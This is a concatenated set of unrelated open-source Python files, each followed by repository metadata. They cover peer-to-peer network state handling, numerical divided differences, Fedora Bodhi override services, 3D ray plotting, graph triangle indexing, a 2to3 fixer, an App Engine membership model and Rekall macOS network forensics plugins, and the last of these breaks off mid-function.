self.reconnect_dcall = None
self.startConnecting()
self.reconnect_dcall = reactor.callLater(when, cb)
def afterShutdownHandlers(self):
raise NotImplementedError("Override me!")
def getOnlineDCH(self):
raise NotImplementedError("Override me!")
def getStateObserver(self):
raise NotImplementedError("Override me!")
def kickObserver(self, lines, rejoin_time):
so = self.getStateObserver()
CHECK(so)
# Act as if Dtella is shutting down.
self.stateChange_DtellaDown()
# Force the observer to go invisible, with a kick message.
so.event_KickMe(lines, rejoin_time)
# Send empty state to Dtella.
self.stateChange_ObserverDown()
def stateChange_ObserverUp(self):
# Called after a DC client / IRC server / etc. has become available.
osm = self.osm
if osm and osm.syncd:
self.osm.updateMyInfo()
# Make sure the observer's still online, because a nick collison
# in updateMyInfo could have killed it.
so = self.getStateObserver()
if so:
so.event_DtellaUp()
def stateChange_ObserverDown(self):
# Called after a DC client / IRC server / etc. has gone away.
CHECK(not self.getStateObserver())
osm = self.osm
if osm and osm.syncd:
osm.updateMyInfo()
# Cancel all nick-specific messages.
for n in osm.nodes:
n.nickRemoved(self)
def stateChange_DtellaUp(self):
# Called after Dtella has finished syncing.
osm = self.osm
CHECK(osm and osm.syncd)
osm.updateMyInfo(send=True)
so = self.getStateObserver()
if so:
so.event_DtellaUp()
def stateChange_DtellaDown(self):
# Called before Dtella network shuts down.
so = self.getStateObserver()
if so:
# Remove every nick.
for n in self.osm.nkm.nickmap.itervalues():
so.event_RemoveNick(n, "Removing All Nicks")
so.event_DtellaDown()
def addMyIPReport(self, from_ad, my_ad):
# from_ad = the IP who sent us this guess
# my_ad = the IP that seems to belong to us
CHECK(from_ad.auth('sx', self))
fromip = from_ad.getRawIP()
myip = my_ad.getRawIP()
# If we already have a report from this fromip in the list, remove it.
try:
i = [r[0] for r in self.myip_reports].index(fromip)
del self.myip_reports[i]
except ValueError:
pass
# Only let list grow to 5 entries
del self.myip_reports[:-4]
# Append this guess to the end
self.myip_reports.append((fromip, myip))
def selectMyIP(self, allow_bad=False):
# Out of the last 5 responses, pick the IP that occurs most often.
# In case of a tie, pick the more recent one.
# Map from ip -> list of indexes
ip_hits = {}
for i, (reporter, ip) in enumerate(self.myip_reports):
try:
ip_hits[ip].append(i)
except KeyError:
ip_hits[ip] = [i]
# Sort by (hit count, highest index) descending.
scores = [(len(hits), hits[-1], ip)
for ip, hits in ip_hits.iteritems()]
scores.sort(reverse=True)
for hit_count, highest_index, ip in scores:
ad = Ad().setRawIP(ip)
ad.port = self.state.udp_port
if allow_bad or ad.auth('sx', self):
return ad
raise ValueError
|
pmarks-net/dtella
|
dtella/common/core.py
|
Python
|
gpl-2.0
| 131,965
|
def p5a():
xs = [-.75, -0.5,-0.25,0]
fxs = [-.0718125, -.02475, .3349375, 1.101]
getdd123(xs,fxs,3)
def getdd123(xs,fxs,n):
#derivatives
l1stdd = []
l2nddd = []
l3rddd = []
for i in range(0,n):
l1stdd.append((fxs[i+1]-fxs[i])/(xs[i+1]-xs[i]))
for i in range(0,n-1):
l2nddd.append((l1stdd[i+1]-l1stdd[i])/(xs[i+2]-xs[i]))
for i in range(0,n-2):
l3rddd.append((l2nddd[i+1]-l2nddd[i])/(xs[i+3]-xs[i]))
#print [l1stdd,l2nddd,l3rddd]
return [l1stdd,l2nddd,l3rddd]
def p7a():
xs = [-.1, 0,.2,.3]
fxs = [5.3, 2, 3.19, 1]
getdd123(xs,fxs,3)
def p14():
xs = [0, .25,.5,.75]
fxs = [1, 2, 3.5, 6]
getdd123(xs,fxs,3)
|
ilcn/NumericalAnalysis
|
a3.py
|
Python
|
gpl-2.0
| 659
|
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import math
from cornice import Service
from pyramid.exceptions import HTTPNotFound
from sqlalchemy import func, distinct
from sqlalchemy.sql import or_
from bodhi import log
from bodhi.models import Build, BuildrootOverride, Package, Release, User
import bodhi.schemas
import bodhi.services.errors
from bodhi.validators import (
validate_override_builds,
validate_expiration_date,
validate_packages,
validate_releases,
validate_username,
)
override = Service(name='override', path='/overrides/{nvr}',
description='Buildroot Overrides',
cors_origins=bodhi.security.cors_origins_ro)
overrides = Service(name='overrides', path='/overrides/',
description='Buildroot Overrides',
# Note, this 'rw' is not a typo. the @comments service has
# a ``post`` section at the bottom.
cors_origins=bodhi.security.cors_origins_rw)
@override.get(accept=("application/json", "text/json"), renderer="json",
error_handler=bodhi.services.errors.json_handler)
@override.get(accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler)
@override.get(accept=("text/html"), renderer="override.html",
error_handler=bodhi.services.errors.html_handler)
def get_override(request):
db = request.db
nvr = request.matchdict.get('nvr')
build = Build.get(nvr, db)
if not build:
request.errors.add('url', 'nvr', 'No such build')
request.errors.status = HTTPNotFound.code
return
if not build.override:
request.errors.add('url', 'nvr',
'No buildroot override for this build')
request.errors.status = HTTPNotFound.code
return
return dict(override=build.override)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=("application/json", "text/json"), renderer="json",
error_handler=bodhi.services.errors.json_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=('application/atom+xml'), renderer='rss',
error_handler=bodhi.services.errors.html_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
@overrides.get(schema=bodhi.schemas.ListOverrideSchema,
accept=('text/html'), renderer='overrides.html',
error_handler=bodhi.services.errors.html_handler,
validators=(validate_packages, validate_releases,
validate_username)
)
def query_overrides(request):
db = request.db
data = request.validated
query = db.query(BuildrootOverride)
expired = data.get('expired')
if expired is not None:
if expired:
query = query.filter(BuildrootOverride.expired_date!=None)
else:
query = query.filter(BuildrootOverride.expired_date==None)
packages = data.get('packages')
if packages is not None:
query = query.join(BuildrootOverride.build).join(Build.package)
query = query.filter(or_(*[Package.name==pkg.name for pkg in packages]))
releases = data.get('releases')
if releases is not None:
query = query.join(BuildrootOverride.build).join(Build.release)
query = query.filter(or_(*[Release.name==r.name for r in releases]))
like = data.get('like')
if like is not None:
query = query.join(BuildrootOverride.build)
query = query.filter(or_(*[
Build.nvr.like('%%%s%%' % like)
]))
submitter = data.get('user')
if submitter is not None:
query = query.filter(BuildrootOverride.submitter==submitter)
query = query.order_by(BuildrootOverride.submission_date.desc())
# We can't use ``query.count()`` here because it is naive with respect to
# all the joins that we're doing above.
count_query = query.with_labels().statement\
.with_only_columns([func.count(distinct(BuildrootOverride.id))])\
.order_by(None)
total = db.execute(count_query).scalar()
page = data.get('page')
rows_per_page = data.get('rows_per_page')
pages = int(math.ceil(total / float(rows_per_page)))
query = query.offset(rows_per_page * (page - 1)).limit(rows_per_page)
return dict(
overrides=query.all(),
page=page,
pages=pages,
rows_per_page=rows_per_page,
total=total,
chrome=data.get('chrome'),
display_user=data.get('display_user'),
)
@overrides.post(schema=bodhi.schemas.SaveOverrideSchema,
acl=bodhi.security.packagers_allowed_acl,
accept=("application/json", "text/json"), renderer='json',
error_handler=bodhi.services.errors.json_handler,
validators=(
validate_override_builds,
validate_expiration_date,
))
@overrides.post(schema=bodhi.schemas.SaveOverrideSchema,
acl=bodhi.security.packagers_allowed_acl,
accept=("application/javascript"), renderer="jsonp",
error_handler=bodhi.services.errors.jsonp_handler,
validators=(
validate_override_builds,
validate_expiration_date,
))
def save_override(request):
"""Save a buildroot override
This entails either creating a new buildroot override, or editing an
existing one. To edit an existing buildroot override, the buildroot
override's original id needs to be specified in the ``edited`` parameter.
"""
data = request.validated
edited = data.pop("edited")
caveats = []
try:
submitter = User.get(request.user.name, request.db)
if edited is None:
builds = data['builds']
overrides = []
if len(builds) > 1:
caveats.append({
'name': 'nvrs',
'description': 'Your override submission was '
'split into %i.' % len(builds)
})
for build in builds:
log.info("Creating a new buildroot override: %s" % build.nvr)
overrides.append(BuildrootOverride.new(
request,
build=build,
submitter=submitter,
notes=data['notes'],
expiration_date=data['expiration_date'],
))
if len(builds) > 1:
result = dict(overrides=overrides)
else:
result = overrides[0]
else:
log.info("Editing buildroot override: %s" % edited)
edited = Build.get(edited, request.db)
if edited is None:
request.errors.add('body', 'edited', 'No such build')
return
result = BuildrootOverride.edit(
request, edited=edited, submitter=submitter,
notes=data["notes"], expired=data["expired"],
expiration_date=data["expiration_date"]
)
if not result:
# Some error inside .edit(...)
return
except Exception as e:
log.exception(e)
request.errors.add('body', 'override',
'Unable to save buildroot override: %s' % e)
return
if not isinstance(result, dict):
result = result.__json__()
result['caveats'] = caveats
return result
|
Akasurde/bodhi
|
bodhi/services/overrides.py
|
Python
|
gpl-2.0
| 8,799
|
import os
import numpy as np
from matplotlib import pyplot as plt
from numpy import genfromtxt
from matplotlib import cm
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
def axisEqual3D(ax):
extents = np.array([getattr(ax, 'get_{}lim'.format(dim))() for dim in 'xyz'])
sz = extents[:, 1] - extents[:, 0]
centers = np.mean(extents, axis=1)
maxsize = max(abs(sz))
r = maxsize/2
for ctr, dim in zip(centers, 'xyz'):
getattr(ax, 'set_{}lim'.format(dim))(ctr - r, ctr + r)
def drawRay(ax, filePath):
# Retrieve ray points
sphericalPoints = genfromtxt(filePath, delimiter=',')
# Retrieve the actual data
r = sphericalPoints[:, 3]
theta = sphericalPoints[:, 4]
phi = sphericalPoints[:, 5]
cosT = np.cos(theta)
sinT = np.sin(theta)
cosP = np.cos(phi)
sinP = np.sin(phi)
x = r * sinT * cosP
y = r * sinT * sinP
z = r * cosT
ax.plot(x, y, z, label='Ray0')
def drawRays(ax, filePath):
# Retrieve ray points
data = genfromtxt(filePath, delimiter=',')
for i in range(0, 100, 10):
ray = data[data[:, 0] == i, :]
ray = ray[ray[:, 2].argsort()[::-1]]
print(ray)
r = ray[:, 3]
theta = ray[:, 4]
phi = ray[:, 5]
cosT = np.cos(theta)
sinT = np.sin(theta)
cosP = np.cos(phi)
sinP = np.sin(phi)
x = r * cosT * sinP
y = r * sinT * sinP
z = r * cosP
ax.plot(x, y, z, label='Ray0', c='blue')
def drawCamera(ax):
camR = 100
camTheta = np.pi/2
camPhi = 0
camX = camR * np.sin(camTheta) * np.cos(camPhi)
camY = camR * np.sin(camTheta) * np.sin(camPhi)
camZ = camR * np.cos(camTheta)
ax.scatter(camX, camY, camZ, s=100, c='red')
x = [1, 1, -1, -1]
y = [1, -1, -1, 1]
z = [-1, -1, -1, -1]
verts = [(x[i], y[i], z[i]) for i in range(4)]
# ax.add_collection3d(Poly3DCollection(verts))
def drawAxes(ax, d=150):
ax.plot((-d, d), (0, 0), (0, 0), 'grey')
ax.plot((0, 0), (-d, d), (0, 0), 'grey')
ax.plot((0, 0), (0, 0), (-d, d), 'gray')
def drawBlackHole(ax, r=5):
# Draw black hole
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x = r * np.outer(np.cos(u), np.sin(v))
y = r * np.outer(np.sin(u), np.sin(v))
z = r * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x, y, z, rstride=4, cstride=4, color='black')
def absoluteFilePaths(directory):
for dirpath, _, filenames in os.walk(directory):
for f in filenames:
yield os.path.abspath(os.path.join(dirpath, f))
if __name__ == '__main__':
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_axis_off()
ax.set_xlim3d(-25, 25)
ax.set_ylim3d(-25, 25)
ax.set_zlim3d(-25, 25)
# axisEqual3D(ax)
drawAxes(ax)
drawBlackHole(ax)
drawCamera(ax)
# drawRay(ax, "Data/rayPositions.csv")
# drawRay(ax, "Data/middleRay.csv")
# drawRays(ax, "Data/rays.csv")
# for fileName in absoluteFilePaths("Data/Spin00001"):
# if fileName.endswith(".csv"):
# drawRay(ax, fileName)
#
drawRay(ax, "Data/Spin00001/ray00.csv")
drawRay(ax, "Data/Spin00001/ray10.csv")
drawRay(ax, "Data/Spin00001/ray20.csv")
# drawRay(ax, "Data/Spin00001/ray30.csv")
drawRay(ax, "Data/Spin00001/ray40.csv")
drawRay(ax, "Data/Spin00001/ray50.csv")
drawRay(ax, "Data/Spin00001/ray60.csv")
# drawRay(ax, "Data/Spin00001/ray70.csv")
drawRay(ax, "Data/Spin00001/ray80.csv")
drawRay(ax, "Data/Spin00001/ray90.csv")
drawRay(ax, "Data/Spin00001/ray99.csv")
# ax.legend()
plt.show()
|
agarciamontoro/TFG
|
Software/Stuff/test_ray.py
|
Python
|
gpl-2.0
| 3,739
|
__author__ = 'Dongwoo Kim'
import itertools
from collections import defaultdict
import numpy as np
def num_neighbor(T, idx, link_val=1):
"""
find neighborhood of given idx (node)
"""
outlink = len(np.nonzero(T[idx, :, :] == link_val))
inlink = len(np.nonzero(T[:, idx, :] == link_val))
return outlink + inlink
def sample_broken_tri(T, link_val=1):
"""
find three nodes which do not have triangular path (i->j->k<-i) and corresponding relations a, b, c
@param T: graph tensor matrix
@return: tuple (x, y, z) where a, b, c is an index of link (i->j), (j->k), (i->k)
"""
find = False
while not find:
i, j, k = np.random.permutation(range(T.shape[0]))[:3]
a, b, c = np.random.randint(T.shape[2], size=3)
if not (T[i, j, a] == link_val and T[j, k, b] == link_val and T[i, k, c] == link_val):
find = True
return ((i, j, a), (j, k, b), (i, k, c))
def tri_index(T, link_val=1):
"""
extract indices of every possible triangular path in the graph
especially for the following path structure
i -> j
j -> k
i -> k
@param T: [E x E x K] tensor graph where T[i,j,k] = 1 when there is type k link between node i and j
@return: list of tuples consist of (x, y, z) where a, b, c is an index of link (i->j), (j->k), (i->k)
"""
T = T.copy()
T[T!=link_val] = 0
e, k = T.shape[0], T.shape[2]
T_squeeze = np.sum(T, 2)
indices = list()
link_types = defaultdict(list)
for i, j in itertools.permutations(range(e), 2):
_tmp = np.nonzero(T[i, j, :])[0]
if len(_tmp) != 0:
link_types[(i, j)] = np.nonzero(T[i, j, :])[0]
for i in range(e):
out_links = np.setdiff1d(np.nonzero(T_squeeze[i, :])[0], i)
for j, k in itertools.permutations(out_links, 2):
if T_squeeze[j, k] != 0: # at least one edge from j to k exists
type_1, type_2, type_3 = link_types[(i, j)], link_types[(j, k)], link_types[(i, k)]
for types in itertools.product(type_1, type_2, type_3):
a = (i, j, types[0])
b = (j, k, types[1])
c = (i, k, types[2])
indices.append((a, b, c))
return indices
def test():
from scipy.io.matlab import loadmat
mat = loadmat('../data/alyawarradata.mat')
T = np.array(mat['Rs'], np.float32)
indices = tri_index(T)
print(len(indices))
for ix in range(10):
a, b, c = indices[ix]
i, j, t1 = a
j, k, t2 = b
i, k, t3 = c
print('a path %d->%d->%d by type %d/%d and a link %d->%d by type %d' % (i, j, k, t1, t2, i, k, t3))
for ix in range(len(indices)):
assert T[i, j, t1] and T[j, k, t2] and T[i, k, t3]
if __name__ == '__main__':
test()
|
chubbymaggie/almc
|
amdc/path_tool.py
|
Python
|
gpl-2.0
| 2,836
|
'''
run with: python ten2eleven.py -f agmethods2 test_dummy_old_MDA_code.py
Author: Tyler Reddy
'''
from lib2to3.fixer_base import BaseFix
from lib2to3.fixer_util import Name, Call, LParen, RParen, ArgList, Dot
from lib2to3 import pytree
class FixAgmethods2(BaseFix):
PATTERN = """
power< head =any+
trailer< dot = '.' method=('bond'|'angle'|'torsion'|
'improper')>
parens=trailer< '(' ')' >
tail=any*>
"""
def transform(self, node, results):
head = results['head']
method = results['method'][0]
tail = results['tail']
syms = self.syms
method_name = method.value
if method_name == 'torsion':
method_name = 'dihedral'
head = [n.clone() for n in head]
tail = [n.clone() for n in tail]
args = head + [pytree.Node(syms.trailer, [Dot(), Name(method_name, prefix = method.prefix), Dot(), Name('value'), LParen(), RParen()])]
new = pytree.Node(syms.power, args)
return new
|
alejob/mdanalysis
|
package/MDAnalysis/migration/fixes/fix_agmethods2.py
|
Python
|
gpl-2.0
| 1,114
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------
# Portello membership system
# Copyright (C) 2014 Klubb Alfa Romeo Norge
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# -------------------------------------------------------------------------
"""Data model for app."""
from google.appengine.ext import db
from google.appengine.api import search
from google.appengine.api import memcache
import datetime
YEAR_MAX = 25
class Country(db.Model):
"""Country. Just to make things simple."""
# Sorting order.
order = db.IntegerProperty(default=1)
# Local name.
name = db.StringProperty()
# Name of country when sending snail-mail
local_name = db.StringProperty()
class Status(db.Model):
"""Member state. Not to be confused with member *type*."""
order = db.IntegerProperty(default=1)
name = db.StringProperty()
class MemberType(db.Model):
"""Types of member."""
order = db.IntegerProperty(default=1)
name = db.StringProperty()
fee = db.IntegerProperty()
active = db.BooleanProperty(default=True)
class SearchMember():
""" A pseudo-member generated from the search results. Not used as proper
members """
pass
class Member(db.Model):
"""A member"""
number = db.StringProperty(indexed=True)
address = db.StringProperty()
email = db.EmailProperty(required=False)
name = db.StringProperty()
county = db.StringProperty()
member_since = db.DateProperty(required=False)
country = db.ReferenceProperty(Country, collection_name='members')
membertype = db.ReferenceProperty(MemberType, collection_name='members')
status = db.ReferenceProperty(Status, collection_name='members')
phone = db.PhoneNumberProperty(required=False)
notes = db.TextProperty(required=False)
zipcode = db.StringProperty()
city = db.StringProperty()
phone_work = db.PhoneNumberProperty(required=False)
phone_home = db.PhoneNumberProperty(required=False)
user = db.UserProperty(required=False)
edit_access_code = db.StringProperty(required=False)
last_change = datetime.datetime.now()
magazine_count = db.IntegerProperty(required=False, default=1)
def put(self, **kwargs):
# update the last_change flag
self.last_change = datetime.datetime.now()
super(Member, self).put(**kwargs)
# Update search index with updated values after saving. Note that
# this is half-assed and puts via db.put() must be handled
# differently.
self.update_index()
@classmethod
def search_member_from_document(cls, document):
ret = SearchMember()
ret.key = document.doc_id
for field in document.fields:
if field.name == 'number':
ret.number = field.value
if field.name == 'name':
ret.name = field.value
if field.name == 'address':
ret.address = field.value
if field.name == 'country':
ret.country = field.value
if field.name == 'type':
ret.membertype = field.value
if field.name == 'email':
ret.email = field.value
if field.name == 'status':
ret.status = field.value
if field.name == 'phone':
ret.phone = field.value
if field.name == 'zip':
ret.zipcode = field.value
if field.name == 'city':
ret.city = field.value
return ret
def create_document(self):
""" Create document to enable full-text search """
if not self.membertype:
print 'Missing member type for', ascii(self.name), self.number
fieldlist = [
search.TextField(name='name', value=self.name),
search.TextField(name='address', value=self.address),
search.TextField(name='country', value=self.country.name),
search.TextField(name='county', value=self.county),
search.TextField(name='notes', value=self.notes),
search.TextField(name='status', value=self.status.name),
search.TextField(name='type', value=self.membertype.name),
search.TextField(name='number', value=self.number),
search.TextField(name='zip', value=self.zipcode),
search.TextField(name='city', value=self.city)
]
if self.member_since:
search.DateField(name='membersince', value=self.member_since),
if self.email:
fieldlist.append(search.TextField(name='email', \
value=self.email))
if self.phone:
fieldlist.append(search.TextField(name='phone', \
value=self.phone))
if self.phone_work:
fieldlist.append(search.TextField(name='phone_work', \
value=self.phone_work))
if self.phone_home:
fieldlist.append(search.TextField(name='phone_home', \
value=self.phone_home))
current_year = datetime.datetime.now().year
paid_dues = {}
for year in range(current_year-5, current_year+5):
paid_dues[year] = 0
dues = MembershipDues.all().ancestor(self).fetch(YEAR_MAX)
for due in dues:
if due.paid:
paid_dues[due.year] = 1
for index_due in range(current_year-5, current_year+5):
fieldlist.append(search.NumberField(name='kontingent' + str(index_due), value=paid_dues[index_due]))
# TODO: Add cars to index?
return search.Document(
doc_id=str(self.key()),
fields=fieldlist)
def update_index(self):
index = search.Index(name='members')
index.put(self.create_document())
def generate_access_code(self):
import os
"""Create easy readable access code for profile editing"""
# This is the alphabet we can use; l, I, 1 and 0, O are obvious,
# S, 5 not so much, 8 and B a little less.
alphabet = 'CDEFHKNPRSTUVWXY46379'
maxlen = len(alphabet)
code = ''
for byte in os.urandom(8):
pos = ord(byte) % maxlen
code += alphabet[pos:pos+1]
self.edit_access_code = code
class MembershipDues(db.Model):
"""Payments for membership fees. One for each year. A new set of
payment entries will be created for each year. The structures parent
will be the member class."""
year = db.IntegerProperty(required=True)
paid = db.BooleanProperty(default=False, required=True)
class ModelRange(db.Model):
"""A model range. In almost all cases there are more than one model in
each range; this is the generic (like 'Spider', 'GTV', 'GT' and so on.)"""
name = db.StringProperty()
year_start = db.IntegerProperty()
year_end = db.IntegerProperty()
notes = db.TextProperty(required=False)
def model_count(self):
count = memcache.get(str(self.key()) + '_count')
if count is not None:
return count
return 0
class CarModel(db.Model):
"""A concrete model, like 'GTV 2.0i Twin Spark' or 'GTV 3.2i V6'"""
model_range = db.ReferenceProperty(ModelRange, collection_name='models')
name = db.StringProperty()
engine_code = db.StringProperty()
typeno = db.StringProperty()
image_url = db.LinkProperty()
year_from = db.IntegerProperty()
year_to = db.IntegerProperty()
notes = db.TextProperty(required=False)
def prettyprint(self):
if self.year_to == 0:
year_to = ''
else:
year_to = str(self.year_to)
return '%s - (%d - %s)' % (self.name, self.year_from, year_to)
class Car(db.Model):
"""A member's car. The parent structure will be the member owning the
car. """
member = db.ReferenceProperty(Member, collection_name='cars')
model = db.ReferenceProperty(CarModel, collection_name='cars')
registration = db.StringProperty()
bought_year = db.IntegerProperty(required=False)
sold_year = db.IntegerProperty(required=False)
year = db.IntegerProperty()
notes = db.TextProperty()
serial_no = db.StringProperty()
delete_on_save = db.BooleanProperty(required=False, default=False)
class User(db.Model):
"""User of the system"""
email = db.EmailProperty()
class ConfigTuple(db.Model):
"""Tuple for configuration parameters. The key names will be used to
name the configuration option."""
value = db.TextProperty()
|
KlubbAlfaRomeoNorge/members
|
model.py
|
Python
|
gpl-2.0
| 9,213
|
# Rekall Memory Forensics
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
__author__ = (
"Michael Cohen <scudette@google.com>",
"Adam Sindelar <adam.sindelar@gmail.com>")
from rekall import obj
from rekall import plugin
from rekall_lib import registry
from rekall.plugins.darwin import common
class DarwinUnpListCollector(common.AbstractDarwinProducer):
"""Walks the global list of sockets in uipc_usrreq."""
name = "unp_sockets"
type_name = "socket"
def collect(self):
for head_const in ["_unp_dhead", "_unp_shead"]:
lhead = self.session.profile.get_constant_object(
head_const,
target="unp_head")
for unp in lhead.lh_first.walk_list("unp_link.le_next"):
yield [unp.unp_socket]
class DarwinSocketsFromHandles(common.AbstractDarwinProducer):
"""Looks up handles that point to a socket and collects the socket."""
name = "open_sockets"
type_name = "socket"
def collect(self):
for fileproc in self.session.plugins.collect("fileproc"):
if fileproc.fg_type == "DTYPE_SOCKET":
yield [fileproc.autocast_fg_data()]
class DarwinNetstat(common.AbstractDarwinCommand):
"""Prints all open sockets we know about, from any source.
Netstat will display even connections that lsof doesn't know about, because
they were either recovered from an allocation zone, or found through a
secondary mechanism (like system call handler cache).
On the other hand, netstat doesn't know the file descriptor or, really, the
process that owns the connection (although it does know the PID of the last
process to access the socket.)
Netstat will also tell you, in the style of psxview, if a socket was only
found using some of the methods available.
"""
name = "netstat"
@classmethod
def methods(cls):
"""Return the names of available socket enumeration methods."""
# Find all the producers that collect procs and inherit from
# AbstractDarwinCachedProducer.
methods = []
for subclass in common.AbstractDarwinProducer.classes.itervalues():
# We look for a plugin which is a producer and a darwin command.
if (issubclass(subclass, common.AbstractDarwinCommand) and
issubclass(subclass, plugin.Producer) and
subclass.type_name == "socket"):
methods.append(subclass.name)
methods.sort()
return methods
@registry.classproperty
@registry.memoize
def table_header(cls): # pylint: disable=no-self-argument
header = [dict(name="socket", type="socket", width=60)]
for method in cls.methods():
header.append(dict(name=method, width=12))
return plugin.PluginHeader(*header)
def collect(self):
methods = self.methods()
for socket in sorted(self.session.plugins.collect("socket"),
key=lambda socket: socket.last_pid):
row = [socket]
for method in methods:
row.append(method in socket.obj_producers)
yield row
class DarwinGetArpListHead(common.AbstractDarwinParameterHook):
"""
One version of arp_init looks like this:
void
arp_init(void)
{
VERIFY(!arpinit_done);
LIST_INIT(&llinfo_arp); // <-- This is the global we want.
llinfo_arp_zone = zinit(sizeof (struct llinfo_arp),
LLINFO_ARP_ZONE_MAX * sizeof (struct llinfo_arp), 0,
LLINFO_ARP_ZONE_NAME);
if (llinfo_arp_zone == NULL)
panic("%s: failed allocating llinfo_arp_zone", __func__);
zone_change(llinfo_arp_zone, Z_EXPAND, TRUE);
zone_change(llinfo_arp_zone, Z_CALLERACCT, FALSE);
arpinit_done = 1;
}
Disassembled, the first few instructions look like this:
0x0 55 PUSH RBP
0x1 4889e5 MOV RBP, RSP
0x4 803d65e9400001 CMP BYTE [RIP+0x40e965], 0x1
0xb 7518 JNZ 0xff80090a7f95
0xd 488d3dee802900 LEA RDI, [RIP+0x2980ee]
0x14 488d35f5802900 LEA RSI, [RIP+0x2980f5]
0x1b baf3000000 MOV EDX, 0xf3
# This is a call to kernel!panic (later kernel!assfail):
0x20 e80b6c1400 CALL 0xff80091eeba0
# This is where it starts initializing the linked list:
0x25 48c70548e94000000000 MOV QWORD [RIP+0x40e948], 0x0
00
0x30 488d0d0e812900 LEA RCX, [RIP+0x29810e]
"""
name = "disassembled_llinfo_arp"
PANIC_FUNCTIONS = (u"__kernel__!_panic", u"__kernel__!_assfail")
def calculate(self):
resolver = self.session.address_resolver
arp_init = resolver.get_constant_object("__kernel__!_arp_init",
target="Function")
instructions = iter(arp_init.Decompose(20))
# Walk down to the CALL mnemonic and use the address resolver to
# see if it calls one of the panic functions.
for instruction in instructions:
# Keep spinning until we get to the first CALL.
if instruction.mnemonic != "CALL":
continue
# This is absolute:
target = instruction.operands[0].value
_, names = resolver.get_nearest_constant_by_address(target)
if not names:
return obj.NoneObject("Could not find CALL in arp_init.")
if names[0] not in self.PANIC_FUNCTIONS:
return obj.NoneObject(
"CALL was to %r, which is not on the PANIC list."
% names)
# We verified it's the right CALL. MOV should be right after it,
# so let's just grab it.
mov_instruction = next(instructions)
if mov_instruction.mnemonic != "MOV":
return obj.NoneObject("arp_init code changed.")
offset = (mov_instruction.operands[0].disp
+ mov_instruction.address
+ mov_instruction.size)
address = self.session.profile.Object(type_name="address",
offset=offset)
llinfo_arp = self.session.profile.Object(
type_name="llinfo_arp",
offset=address.v())
if llinfo_arp.isvalid:
return llinfo_arp.obj_offset
return obj.NoneObject("llinfo_arp didn't validate.")
class DarwinArp(common.AbstractDarwinProducer):
"""Show information about arp tables."""
name = "arp"
type_name = "rtentry"
def collect(self):
llinfo_arp = self.session.address_resolver.get_constant_object(
"__kernel__!_llinfo_arp",
target="Pointer",
target_args=dict(target="llinfo_arp"))
if not llinfo_arp:
# Must not have it in the profile. Try asking the session hook
# for the address.
offset = self.session.GetParameter("disassembled_llinfo_arp")
if not offset:
self.session.logging.error(
"Could not find the address of llinfo_arp.")
return
llinfo_arp = self.session.profile.Object(
type_name="llinfo_arp", offset=offset)
for arp_hit in llinfo_arp.walk_list("la_le.le_next"):
yield [arp_hit.la_rt]
class DarwinRoute(common.AbstractDarwinCommand):
"""Show routing table."""
__name = "route"
RNF_ROOT = 2
def rn_walk_tree(self, h):
"""Walks the radix tree starting from the header h.
This function is taken from
xnu-2422.1.72/bsd/net/radix.c: rn_walk_tree()
Which is why it does not conform to the style guide.
Note too that the darwin source code abuses C macros:
#define rn_dupedkey rn_u.rn_leaf.rn_Dupedkey
#define rn_key rn_u.rn_leaf.rn_Key
#define rn_mask rn_u.rn_leaf.rn_Mask
#define rn_offset rn_u.rn_node.rn_Off
#define rn_left rn_u.rn_node.rn_L
#define rn_right rn_u.rn_node.rn_R
And then the original code does:
rn = rn.rn_left
So we replace these below.
"""
rn = h.rnh_treetop
seen = set()
# First time through node, go left */
while rn.rn_bit >= 0:
rn = rn.rn_u.rn_node.rn_L
while rn and rn not in seen:
base = rn
seen.add(rn)
# If at right child go back up, otherwise, go right
while (rn.rn_parent.rn_u.rn_node.rn_R == rn and
not rn.rn_flags & self.RNF_ROOT):
rn = rn.rn_parent
# Find the next *leaf* to start from
rn = rn.rn_parent.rn_u.rn_node.rn_R
while rn.rn_bit >= 0:
rn = rn.rn_u.rn_node.rn_L
next = rn
# Process leaves
while True:
rn = base
if not rn:
break
base = rn.rn_u.rn_leaf.rn_Dupedkey
if not rn.rn_flags & self.RNF_ROOT:
yield rn
rn = next
if rn.rn_flags & self.RNF_ROOT:
return
def render(self, renderer):
renderer.table_header(
